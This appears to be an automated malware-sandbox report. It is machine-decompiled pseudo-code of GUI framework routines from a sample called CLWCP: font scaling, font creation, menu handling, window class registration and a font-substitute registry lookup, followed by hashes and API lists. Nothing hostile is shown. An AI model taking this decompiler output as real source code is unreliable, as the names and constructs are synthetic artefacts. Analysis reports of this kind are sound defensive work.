                                  control_flow_graph 667 44e4c0-44e514 call 437d5c call 403324 672 44e516-44e522 667->672 673 44e528-44e52d call 43749c 667->673 672->673 675 44e532-44e53c 673->675 676 44e542-44e54c 675->676 677 44e69e-44e6a9 675->677 676->677 680 44e552-44e55c 676->680 678 44e6b5-44e6c0 677->678 679 44e6ab-44e6b0 call 4345a8 677->679 684 44e6c2-44e6c7 call 4345ec 678->684 685 44e6cc-44e6de 678->685 679->678 681 44e5a1-44e5c7 call 44e898 680->681 682 44e55e-44e570 680->682 681->677 696 44e5cd-44e5f8 call 44daa0 call 43b514 681->696 682->681 686 44e572-44e59c call 41d85c MulDiv call 41d864 682->686 684->685 689 44e704-44e72a call 435de4 call 437d64 685->689 690 44e6e0-44e6ff call 44daa0 call 43b514 685->690 686->681 690->689 707 44e61d-44e627 696->707 708 44e5fa-44e617 MulDiv 696->708 709 44e64c-44e656 707->709 710 44e629-44e646 MulDiv 707->710 708->707 709->677 711 44e658-44e698 MulDiv * 2 709->711 710->709 711->677
                                  C-Code - Quality: 89%
                                  			E0044E4C0(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _v8;
				int _t100;
				int _t102;
				intOrPtr _t119;
				int _t124;
				intOrPtr _t157;
				signed char _t166;
				void* _t168;
				intOrPtr _t185;
				intOrPtr _t197;
				void* _t200;
				void* _t202;
				int _t203;
				intOrPtr _t207;
				void* _t209;
				signed char _t210;

				_t200 = __edi;
				_t206 = _t207;
				_t202 = __edx;
				_v8 = __eax;
				E00437D5C(_v8);
				_push(_t207);
				_push(0x44e72b);
				_push( *[fs:edx]);
				 *[fs:edx] = _t207;
				 *(_v8 + 0x280) = 0;
				 *(_v8 + 0x284) = 0;
				 *(_v8 + 0x288) = 0;
				_t168 = 0;
				_t209 = E00403324( *_v8) -  *0x44b178; // 0x44b1c4
				if(_t209 == 0) {
					_t166 =  *0x470661 & 0x000000ff ^ 0x00000001;
					_t210 = _t166;
					 *(_v8 + 0x24c) = _t166;
				}
				E0043749C(_v8, _t168, _t202, _t210); // executed
				if( *(_v8 + 0x274) == 0 ||  *(_v8 + 0x288) <= 0) {
					L14:
					_t100 =  *(_v8 + 0x280);
					_t219 = _t100;
					if(_t100 > 0) {
						E004345A8(_v8, _t100, _t219);
					}
					_t102 =  *(_v8 + 0x284);
					_t220 = _t102;
					if(_t102 > 0) {
						E004345EC(_v8, _t102, _t220);
					}
					 *(_v8 + 0x98) =  *0x44e738 & 0x000000ff;
					_t221 = _t168;
					if(_t168 == 0) {
						E0044DAA0(_v8, 1, 1);
						E0043B514(_v8, 1, 1, _t221);
					}
					E00435DE4(_v8, 0, 0xb03d, 0);
					_pop(_t185);
					 *[fs:eax] = _t185;
					_push(0x44e732);
					return E00437D64(_v8);
				} else {
					if(( *(_v8 + 0x98) & 0x00000010) != 0) {
						_t197 =  *0x470b44; // 0x0
						if( *(_v8 + 0x274) !=  *((intOrPtr*)(_t197 + 0x40))) {
							_t157 =  *0x470b44; // 0x0
							E0041D864( *((intOrPtr*)(_v8 + 0x68)), MulDiv(E0041D85C( *((intOrPtr*)(_v8 + 0x68))),  *(_t157 + 0x40),  *(_v8 + 0x274)), _t200, _t206);
						}
					}
					_t119 =  *0x470b44; // 0x0
					 *(_v8 + 0x274) =  *(_t119 + 0x40);
					_t203 = E0044E898(_v8);
					_t124 =  *(_v8 + 0x288);
					_t215 = _t203 - _t124;
					if(_t203 != _t124) {
						_t168 = 1;
						E0044DAA0(_v8, _t124, _t203);
						E0043B514(_v8,  *(_v8 + 0x288), _t203, _t215);
						if(( *(_v8 + 0x98) & 0x00000004) != 0) {
							 *(_v8 + 0x280) = MulDiv( *(_v8 + 0x280), _t203,  *(_v8 + 0x288));
						}
						if(( *(_v8 + 0x98) & 0x00000008) != 0) {
							 *(_v8 + 0x284) = MulDiv( *(_v8 + 0x284), _t203,  *(_v8 + 0x288));
						}
						if(( *(_v8 + 0x98) & 0x00000020) != 0) {
							 *(_v8 + 0x212) = MulDiv( *(_v8 + 0x212), _t203,  *(_v8 + 0x288));
							 *(_v8 + 0x216) = MulDiv( *(_v8 + 0x216), _t203,  *(_v8 + 0x288));
						}
					}
					goto L14;
				}
			}



















                                  0x0044e4c0
                                  0x0044e4c1
                                  0x0044e4c6
                                  0x0044e4c8
                                  0x0044e4ce
                                  0x0044e4d5
                                  0x0044e4d6
                                  0x0044e4db
                                  0x0044e4de
                                  0x0044e4e6
                                  0x0044e4f1
                                  0x0044e4fc
                                  0x0044e502
                                  0x0044e50e
                                  0x0044e514
                                  0x0044e51d
                                  0x0044e51d
                                  0x0044e522
                                  0x0044e522
                                  0x0044e52d
                                  0x0044e53c
                                  0x0044e69e
                                  0x0044e6a1
                                  0x0044e6a7
                                  0x0044e6a9
                                  0x0044e6b0
                                  0x0044e6b0
                                  0x0044e6b8
                                  0x0044e6be
                                  0x0044e6c0
                                  0x0044e6c7
                                  0x0044e6c7
                                  0x0044e6d6
                                  0x0044e6dc
                                  0x0044e6de
                                  0x0044e6ed
                                  0x0044e6ff
                                  0x0044e6ff
                                  0x0044e710
                                  0x0044e717
                                  0x0044e71a
                                  0x0044e71d
                                  0x0044e72a
                                  0x0044e552
                                  0x0044e55c
                                  0x0044e567
                                  0x0044e570
                                  0x0044e57c
                                  0x0044e59c
                                  0x0044e59c
                                  0x0044e570
                                  0x0044e5a1
                                  0x0044e5ac
                                  0x0044e5ba
                                  0x0044e5bf
                                  0x0044e5c5
                                  0x0044e5c7
                                  0x0044e5cd
                                  0x0044e5d6
                                  0x0044e5e9
                                  0x0044e5f8
                                  0x0044e617
                                  0x0044e617
                                  0x0044e627
                                  0x0044e646
                                  0x0044e646
                                  0x0044e656
                                  0x0044e675
                                  0x0044e698
                                  0x0044e698
                                  0x0044e656
                                  0x00000000
                                  0x0044e5c7

                                  APIs
                                  • MulDiv.KERNEL32(00000000,?,00000000), ref: 0044E593
                                  • MulDiv.KERNEL32(?,00000000,00000000), ref: 0044E60F
                                  • MulDiv.KERNEL32(?,00000000,00000000), ref: 0044E63E
                                  • MulDiv.KERNEL32(?,00000000,00000000), ref: 0044E66D
                                  • MulDiv.KERNEL32(?,00000000,00000000), ref: 0044E690
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4ae2a93f609c8b92079eba273e91d65aceb726c8cb7da1e0ad4459303d86227c
                                  • Instruction ID: 128e5020ed250e527bf5469045c59b60cdbb334c0f5b29dbca18e1ec78d45793
                                  • Opcode Fuzzy Hash: 4ae2a93f609c8b92079eba273e91d65aceb726c8cb7da1e0ad4459303d86227c
                                  • Instruction Fuzzy Hash: CE71B474A01104EFDB40EBA9C689AAEB7F5AF49304F6541F5E908DB362DB34AE409B44
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041D650, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 142COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 82%
                                  			E0041D650(void* __eax, void* __ebx, void* __ecx) {
				char _v8;
				signed int _v12;
				struct tagLOGFONTA _v72;
				char _v76;
				char _v80;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t94;
				int _t107;
				char* _t109;
				int _t111;
				int _t114;
				void* _t122;
				void* _t131;
				intOrPtr _t142;
				void* _t152;
				void* _t153;
				intOrPtr _t154;

				_t152 = _t153;
				_t154 = _t153 + 0xffffffb4;
				_v80 = 0;
				_v76 = 0;
				_v8 = 0;
				_t131 = __eax;
				_push(_t152);
				_push(0x41d81a);
				_push( *[fs:eax]);
				 *[fs:eax] = _t154;
				_v12 =  *((intOrPtr*)(__eax + 0x10));
				if( *((intOrPtr*)(_v12 + 8)) != 0) {
					 *[fs:eax] = 0;
					_push(E0041D821);
					E00404140( &_v80, 2);
					_t73 =  &_v8; // 0x41e740
					return E0040411C(_t73);
				} else {
					_t84 =  *0x4708e4; // 0x20f0ac4
					E0041C984(_t84);
					_push(_t152);
					_push(0x41d7ea);
					_push( *[fs:edx]);
					 *[fs:edx] = _t154;
					if( *((intOrPtr*)(_v12 + 8)) == 0) {
						_v72.lfHeight =  *(_v12 + 0x14);
						_v72.lfWidth = 0;
						_t94 =  *((intOrPtr*)(_v12 + 0x18));
						_v72.lfEscapement = _t94;
						_v72.lfOrientation = _t94;
						if(( *(_v12 + 0x1d) & 0x00000001) == 0) {
							_v72.lfWeight = 0x190;
						} else {
							_v72.lfWeight = 0x2bc;
						}
						_v72.lfItalic = _v12 & 0xffffff00 | ( *(_v12 + 0x1d) & 0x00000002) != 0x00000000;
						_v72.lfUnderline = _v12 & 0xffffff00 | ( *(_v12 + 0x1d) & 0x00000004) != 0x00000000;
						_v72.lfStrikeOut = _v12 & 0xffffff00 | ( *(_v12 + 0x1d) & 0x00000008) != 0x00000000;
						_v72.lfCharSet =  *(_v12 + 0x1e) & 0x000000ff;
						_t48 =  &_v8; // 0x41e740
						E00404380(_t48, _v12 + 0x1f);
						_t107 = E004043DC("Default");
						_t109 = E004045DC("Default");
						_t50 =  &_v8; // 0x41e740
						_t111 = E004043DC( *_t50);
						_t51 =  &_v8; // 0x41e740
						_t114 = CompareStringA(0x400, 1, E004045DC( *_t51), _t111, _t109, _t107); // executed
						if(_t114 != 2) {
							E00404380( &_v80, _v12 + 0x1f);
							E00408970( &(_v72.lfFaceName), _v80);
						} else {
							E00404380( &_v76, 0x46e433);
							E00408970( &(_v72.lfFaceName), _v76);
						}
						_v72.lfQuality = 0;
						if(_v72.lfOrientation == 0) {
							_v72.lfOutPrecision = 0;
						} else {
							_v72.lfOutPrecision = 7;
						}
						_v72.lfClipPrecision = 0;
						_t122 = E0041D974(_t131) - 1;
						if(_t122 == 0) {
							_v72.lfPitchAndFamily = 2;
						} else {
							if(_t122 == 1) {
								_v72.lfPitchAndFamily = 1;
							} else {
								_v72.lfPitchAndFamily = 0;
							}
						}
						 *((intOrPtr*)(_v12 + 8)) = CreateFontIndirectA( &_v72);
					}
					_pop(_t142);
					 *[fs:eax] = _t142;
					_push(E0041D7F1);
					_t88 =  *0x4708e4; // 0x20f0ac4
					return E0041C990(_t88);
				}
			}





















                                  0x0041d651
                                  0x0041d653
                                  0x0041d659
                                  0x0041d65c
                                  0x0041d65f
                                  0x0041d662
                                  0x0041d666
                                  0x0041d667
                                  0x0041d66c
                                  0x0041d66f
                                  0x0041d675
                                  0x0041d67f
                                  0x0041d7fc
                                  0x0041d7ff
                                  0x0041d80c
                                  0x0041d811
                                  0x0041d819
                                  0x0041d685
                                  0x0041d685
                                  0x0041d68a
                                  0x0041d691
                                  0x0041d692
                                  0x0041d697
                                  0x0041d69a
                                  0x0041d6a4
                                  0x0041d6b0
                                  0x0041d6b5
                                  0x0041d6bb
                                  0x0041d6be
                                  0x0041d6c1
                                  0x0041d6cb
                                  0x0041d6d6
                                  0x0041d6cd
                                  0x0041d6cd
                                  0x0041d6cd
                                  0x0041d6e7
                                  0x0041d6f4
                                  0x0041d701
                                  0x0041d70b
                                  0x0041d70e
                                  0x0041d717
                                  0x0041d721
                                  0x0041d72c
                                  0x0041d732
                                  0x0041d735
                                  0x0041d73b
                                  0x0041d74b
                                  0x0041d755
                                  0x0041d77a
                                  0x0041d785
                                  0x0041d757
                                  0x0041d75f
                                  0x0041d76a
                                  0x0041d76a
                                  0x0041d78a
                                  0x0041d792
                                  0x0041d79a
                                  0x0041d794
                                  0x0041d794
                                  0x0041d794
                                  0x0041d79e
                                  0x0041d7a9
                                  0x0041d7ab
                                  0x0041d7b3
                                  0x0041d7ad
                                  0x0041d7af
                                  0x0041d7b9
                                  0x0041d7b1
                                  0x0041d7bf
                                  0x0041d7bf
                                  0x0041d7af
                                  0x0041d7cf
                                  0x0041d7cf
                                  0x0041d7d4
                                  0x0041d7d7
                                  0x0041d7da
                                  0x0041d7df
                                  0x0041d7e9
                                  0x0041d7e9

                                  APIs
                                    • Part of subcall function 0041C984: RtlEnterCriticalSection.KERNEL32(020F0B0C,0041DECF), ref: 0041C988
                                  • CompareStringA.KERNEL32(00000400,00000001,00000000,00000000,00000000,00000000,00000000,0041D7EA,?,00000000,0041D81A,?,?), ref: 0041D74B
                                  • CreateFontIndirectA.GDI32(?), ref: 0041D7C7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: CompareCreateCriticalEnterFontIndirectSectionString
                                  • String ID: @A$Default
                                  • API String ID: 249151401-987323561
                                  • Opcode ID: 65291dbad2b4feaf13c3c019b21fb5f83c6b1cb0a76c38db1c8fca1b33a4bc33
                                  • Instruction ID: 739a49131c0ede94c9ead4fe0ef6b5e2e0870e321c3aab5a5cc7aeece4e5682c
                                  • Opcode Fuzzy Hash: 65291dbad2b4feaf13c3c019b21fb5f83c6b1cb0a76c38db1c8fca1b33a4bc33
                                  • Instruction Fuzzy Hash: C45182B0E04248DFDB00DFA9C485BCDBBF5AF48304F1580AAE850B7392C7789A85CB59
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0044FB80, Relevance: 6.1, APIs: 4, Instructions: 148windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 90%
                                  			E0044FB80(void* __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				void* _t41;
				void* _t54;
				void* _t61;
				struct HMENU__* _t64;
				struct HMENU__* _t70;
				intOrPtr _t77;
				void* _t79;
				intOrPtr _t81;
				intOrPtr _t83;
				intOrPtr _t87;
				void* _t92;
				intOrPtr _t98;
				void* _t111;
				intOrPtr _t113;
				void* _t116;

				_v20 = 0;
				_t113 = __edx;
				_t92 = __eax;
				_push(_t116);
				_push(0x44fd46);
				_push( *[fs:eax]);
				 *[fs:eax] = _t116 + 0xfffffff0;
				if(__edx == 0) {
					L7:
					_t39 =  *((intOrPtr*)(_t92 + 0x260));
					if( *((intOrPtr*)(_t92 + 0x260)) != 0) {
						E00449164(_t39, 0, 0);
					}
					if(( *(_t92 + 0x1c) & 0x00000008) != 0 || _t113 != 0 && ( *(_t113 + 0x1c) & 0x00000008) != 0) {
						_t113 = 0;
					}
					 *((intOrPtr*)(_t92 + 0x260)) = _t113;
					if(_t113 != 0) {
						E00419BB8(_t113, _t92);
					}
					if(_t113 == 0 || ( *(_t92 + 0x1c) & 0x00000010) == 0 &&  *((char*)(_t92 + 0x241)) == 3) {
						_t41 = E0043BD58(_t92);
						__eflags = _t41;
						if(_t41 != 0) {
							SetMenu(E0043BA58(_t92), 0); // executed
						}
						goto L30;
					} else {
						if( *((char*)( *((intOrPtr*)(_t92 + 0x260)) + 0x5c)) != 0 ||  *((char*)(_t92 + 0x247)) == 1) {
							if(( *(_t92 + 0x1c) & 0x00000010) == 0) {
								__eflags =  *((char*)(_t92 + 0x247)) - 1;
								if( *((char*)(_t92 + 0x247)) != 1) {
									_t54 = E0043BD58(_t92);
									__eflags = _t54;
									if(_t54 != 0) {
										SetMenu(E0043BA58(_t92), 0);
									}
								}
								goto L30;
							}
							goto L21;
						} else {
							L21:
							if(E0043BD58(_t92) != 0) {
								_t61 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t92 + 0x260)))) + 0x34))();
								_t64 = GetMenu(E0043BA58(_t92));
								_t138 = _t61 - _t64;
								if(_t61 != _t64) {
									_t70 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t92 + 0x260)))) + 0x34))();
									SetMenu(E0043BA58(_t92), _t70);
								}
								E00449164(_t113, E0043BA58(_t92), _t138);
							}
							L30:
							if( *((char*)(_t92 + 0x246)) != 0) {
								E00451074(_t92, 1);
							}
							E0044FAB8(_t92);
							_pop(_t98);
							 *[fs:eax] = _t98;
							_push(0x44fd4d);
							return E0040411C( &_v20);
						}
					}
				}
				_t77 =  *0x470b44; // 0x0
				_t79 = E00453B08(_t77) - 1;
				if(_t79 >= 0) {
					_v8 = _t79 + 1;
					_t111 = 0;
					do {
						_t81 =  *0x470b44; // 0x0
						if(_t113 ==  *((intOrPtr*)(E00453AF4(_t81, _t111) + 0x260))) {
							_t83 =  *0x470b44; // 0x0
							if(_t92 != E00453AF4(_t83, _t111)) {
								_v16 =  *((intOrPtr*)(_t113 + 8));
								_v12 = 0xb;
								_t87 =  *0x46fa94; // 0x41b820
								E00405C70(_t87,  &_v20);
								E0040B86C(_t92, _v20, 1, _t111, _t113, 0,  &_v16);
								E00403B64();
							}
						}
						_t111 = _t111 + 1;
						_t10 =  &_v8;
						 *_t10 = _v8 - 1;
					} while ( *_t10 != 0);
				}
			}






















                                  0x0044fb8b
                                  0x0044fb8e
                                  0x0044fb90
                                  0x0044fb94
                                  0x0044fb95
                                  0x0044fb9a
                                  0x0044fb9d
                                  0x0044fba2
                                  0x0044fc14
                                  0x0044fc14
                                  0x0044fc1c
                                  0x0044fc20
                                  0x0044fc20
                                  0x0044fc29
                                  0x0044fc35
                                  0x0044fc35
                                  0x0044fc37
                                  0x0044fc3f
                                  0x0044fc45
                                  0x0044fc45
                                  0x0044fc4c
                                  0x0044fcff
                                  0x0044fd04
                                  0x0044fd06
                                  0x0044fd12
                                  0x0044fd12
                                  0x00000000
                                  0x0044fc65
                                  0x0044fc6f
                                  0x0044fc7e
                                  0x0044fcd8
                                  0x0044fcdf
                                  0x0044fce3
                                  0x0044fce8
                                  0x0044fcea
                                  0x0044fcf6
                                  0x0044fcf6
                                  0x0044fcea
                                  0x00000000
                                  0x0044fcdf
                                  0x00000000
                                  0x0044fc80
                                  0x0044fc80
                                  0x0044fc89
                                  0x0044fc97
                                  0x0044fca4
                                  0x0044fca9
                                  0x0044fcab
                                  0x0044fcb5
                                  0x0044fcc1
                                  0x0044fcc1
                                  0x0044fcd1
                                  0x0044fcd1
                                  0x0044fd17
                                  0x0044fd1e
                                  0x0044fd24
                                  0x0044fd24
                                  0x0044fd2b
                                  0x0044fd32
                                  0x0044fd35
                                  0x0044fd38
                                  0x0044fd45
                                  0x0044fd45
                                  0x0044fc6f
                                  0x0044fc4c
                                  0x0044fba4
                                  0x0044fbae
                                  0x0044fbb1
                                  0x0044fbb4
                                  0x0044fbb7
                                  0x0044fbb9
                                  0x0044fbbb
                                  0x0044fbcb
                                  0x0044fbcf
                                  0x0044fbdb
                                  0x0044fbe0
                                  0x0044fbe3
                                  0x0044fbf0
                                  0x0044fbf5
                                  0x0044fc04
                                  0x0044fc09
                                  0x0044fc09
                                  0x0044fbdb
                                  0x0044fc0e
                                  0x0044fc0f
                                  0x0044fc0f
                                  0x0044fc0f
                                  0x0044fbb9

                                  APIs
                                  • GetMenu.USER32(00000000), ref: 0044FCA4
                                  • SetMenu.USER32(00000000,00000000), ref: 0044FCC1
                                  • SetMenu.USER32(00000000,00000000), ref: 0044FCF6
                                  • SetMenu.USER32(00000000,00000000,00000000,0044FD46), ref: 0044FD12
                                    • Part of subcall function 00405C70: LoadStringA.USER32 ref: 00405CA2
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: Menu$LoadString
                                  • String ID:
                                  • API String ID: 3688185913-0
                                  • Opcode ID: c5de511c21ab8780834b3b306e53e167780641b181c159ffac61f4368521a722
                                  • Instruction ID: 1a29f9ccac0dd26856483d5454cf6bd258572c0209b94bbc440ae90d4017f4e7
                                  • Opcode Fuzzy Hash: c5de511c21ab8780834b3b306e53e167780641b181c159ffac61f4368521a722
                                  • Instruction Fuzzy Hash: B551D170A042894AEB21EF3A89C575B7794AF05308F04447BFC459B3A7CB7CDD498B99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041AC4C, Relevance: 6.1, APIs: 4, Instructions: 59registryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 94%
                                  			E0041AC4C(intOrPtr _a4, short _a6, intOrPtr _a8) {
				struct _WNDCLASSA _v44;
				struct HINSTANCE__* _t6;
				CHAR* _t8;
				struct HINSTANCE__* _t9;
				int _t10;
				void* _t11;
				struct HINSTANCE__* _t13;
				struct HWND__* _t15;
				long _t17;
				struct HINSTANCE__* _t19;
				CHAR* _t20;
				struct HWND__* _t22;
				CHAR* _t24;

				_t6 =  *0x470664; // 0x400000
				 *0x46e3fc = _t6;
				_t8 =  *0x46e410; // 0x41ac3c
				_t9 =  *0x470664; // 0x400000
				_t10 = GetClassInfoA(_t9, _t8,  &_v44);
				asm("sbb eax, eax");
				_t11 = _t10 + 1;
				if(_t11 == 0 || L004065DC != _v44.lpfnWndProc) {
					if(_t11 != 0) {
						_t19 =  *0x470664; // 0x400000
						_t20 =  *0x46e410; // 0x41ac3c
						UnregisterClassA(_t20, _t19);
					}
					RegisterClassA(0x46e3ec);
				}
				_t13 =  *0x470664; // 0x400000
				_t24 =  *0x46e410; // 0x41ac3c
				_t15 = E00406AC4(0x80, _t24, 0, _t13, 0, 0, 0, 0, 0, 0, 0x80000000); // executed
				_t22 = _t15;
				if(_a6 != 0) {
					_t17 = E0041AB90(_a4, _a8); // executed
					SetWindowLongA(_t22, 0xfffffffc, _t17);
				}
				return _t22;
			}
















                                  0x0041ac53
                                  0x0041ac58
                                  0x0041ac61
                                  0x0041ac67
                                  0x0041ac6d
                                  0x0041ac75
                                  0x0041ac77
                                  0x0041ac7a
                                  0x0041ac88
                                  0x0041ac8a
                                  0x0041ac90
                                  0x0041ac96
                                  0x0041ac96
                                  0x0041aca0
                                  0x0041aca0
                                  0x0041acb6
                                  0x0041acc3
                                  0x0041acce
                                  0x0041acd3
                                  0x0041acda
                                  0x0041ace2
                                  0x0041aceb
                                  0x0041aceb
                                  0x0041acf6

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: Class$InfoLongRegisterUnregisterWindow
                                  • String ID:
                                  • API String ID: 4025006896-0
                                  • Opcode ID: adb6a6ae84dc75b0f5b0c5503d1f7463da4670fd0a75e21a96e768dfdfa26840
                                  • Instruction ID: e5348abac26c0eb10b98baa919fabb55af62f4aa143a7201ce494f9896c5eedb
                                  • Opcode Fuzzy Hash: adb6a6ae84dc75b0f5b0c5503d1f7463da4670fd0a75e21a96e768dfdfa26840
                                  • Instruction Fuzzy Hash: 8E016171201204ABDB00EB69DC91FAA33DDE708314F108536F915E73D1FA7AD8A08B9E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00424840, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 58%
                                  			E00424840(void* __ebx, void* __esi, void* __eflags) {
				char _v8;
				intOrPtr _v12;
				int _t11;
				void* _t20;
				intOrPtr _t35;
				void* _t39;
				void* _t40;
				intOrPtr _t41;

				_t39 = _t40;
				_t41 = _t40 + 0xfffffef8;
				_v8 = 0;
				_push(_t39);
				_push(0x424923);
				_push( *[fs:eax]);
				 *[fs:eax] = _t41;
				_t11 =  *0x4708a0; // 0x60
				 *0x46e428 =  ~(MulDiv(8, _t11, 0x48));
				_v12 = E0041B004(1);
				_push(_t39);
				_push(0x4248db);
				_push( *[fs:eax]);
				 *[fs:eax] = _t41;
				E0041B0A4(_v12, 0x80000002);
				_t20 = E0041B22C(_v12, __ebx, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\FontSubstitutes", __esi); // executed
				_t43 = _t20;
				if(_t20 != 0) {
					E0041B45C(_v12,  &_v8, "MS Shell Dlg 2", _t43);
					E0041B074(_v12);
				}
				_pop(_t35);
				 *[fs:eax] = _t35;
				_push(0x4248e2);
				return E00403398(_v12);
			}











                                  0x00424841
                                  0x00424843
                                  0x0042484b
                                  0x00424850
                                  0x00424851
                                  0x00424856
                                  0x00424859
                                  0x0042485e
                                  0x0042486d
                                  0x0042487e
                                  0x00424883
                                  0x00424884
                                  0x00424889
                                  0x0042488c
                                  0x00424897
                                  0x004248a4
                                  0x004248a9
                                  0x004248ab
                                  0x004248b8
                                  0x004248c0
                                  0x004248c0
                                  0x004248c7
                                  0x004248ca
                                  0x004248cd
                                  0x004248da

                                  APIs
                                  • MulDiv.KERNEL32(00000008,00000060,00000048), ref: 00424866
                                    • Part of subcall function 0041B0A4: RegCloseKey.ADVAPI32(10940000,0041AF80,00000001,0041B022,?,?,0042487E,00000008,00000060,00000048,00000000,00424923), ref: 0041B0B8
                                    • Part of subcall function 0041B22C: RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,00020019,?,00000000,0041B3C6), ref: 0041B298
                                    • Part of subcall function 0041B074: RegFlushKey.ADVAPI32(00000000,?,0041B0E0,?,?,00000000,0041B1F7,?,00000000,00000000,00000000,?,?,00000000,0041B20D), ref: 0041B085
                                    • Part of subcall function 0041B074: RegCloseKey.ADVAPI32(00000000,?,0041B0E0,?,?,00000000,0041B1F7,?,00000000,00000000,00000000,?,?,00000000,0041B20D), ref: 0041B08E
                                  Strings
                                  • MS Shell Dlg 2, xrefs: 004248B0
                                  • SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes, xrefs: 0042489C
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: Close$FlushOpen
                                  • String ID: MS Shell Dlg 2$SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes
                                  • API String ID: 577849800-1582137206
                                  • Opcode ID: 361d1be615ce033ae6f529f53cc4e3ed7e6fd2b71402227f0fdb964afacfc99b
                                  • Instruction ID: d3ed5a1644a865c585e1387f0a344306d0ea90a7519c76b39116b58d0fda558d
                                  • Opcode Fuzzy Hash: 361d1be615ce033ae6f529f53cc4e3ed7e6fd2b71402227f0fdb964afacfc99b
                                  • Instruction Fuzzy Hash: 0201A174710204AFD700EF79D85299E7BE4EB89704F9244B6F800D7691DB395E41CB48
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041B22C, Relevance: 4.6, APIs: 3, Instructions: 132registryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 63%
                                  			E0041B22C(void* __eax, void* __ebx, void* __edx, void* __esi) {
				char _v8;
				char _v9;
				void* _v16;
				char* _t61;
				signed int _t64;
				char* _t67;
				signed int _t70;
				char* _t73;
				signed int _t76;
				signed char _t96;
				intOrPtr _t109;
				void* _t118;
				void* _t121;

				_v8 = 0;
				_t118 = __eax;
				_push(_t121);
				_push(0x41b3c6);
				_push( *[fs:eax]);
				 *[fs:eax] = _t121 + 0xfffffff4;
				E004041B4( &_v8, __edx);
				_t96 = E0041AFC8(_v8);
				if(_t96 == 0) {
					E0040467C( &_v8, 1, 1);
				}
				_v16 = 0;
				_t61 = E004045DC(_v8);
				_t64 = RegOpenKeyExA(E0041B0F4(_t118, _t96), _t61, 0, 0x20019,  &_v16); // executed
				_v9 = _t64 == 0;
				if(_v9 == 0) {
					_t67 = E004045DC(_v8);
					_t70 = RegOpenKeyExA(E0041B0F4(_t118, _t96), _t67, 0, 0x20009,  &_v16);
					_v9 = _t70 == 0;
					if(_v9 == 0) {
						_t73 = E004045DC(_v8);
						_t76 = RegOpenKeyExA(E0041B0F4(_t118, _t96), _t73, 0, 1,  &_v16);
						_v9 = _t76 == 0;
						if(_v9 != 0) {
							 *(_t118 + 0x18) = 1;
							if(((_t76 & 0xffffff00 |  *((intOrPtr*)(_t118 + 4)) != 0x00000000) & _t96) != 0) {
								_push( *((intOrPtr*)(_t118 + 0x10)));
								_push(E0041B3E0);
								_push(_v8);
								E0040449C();
							}
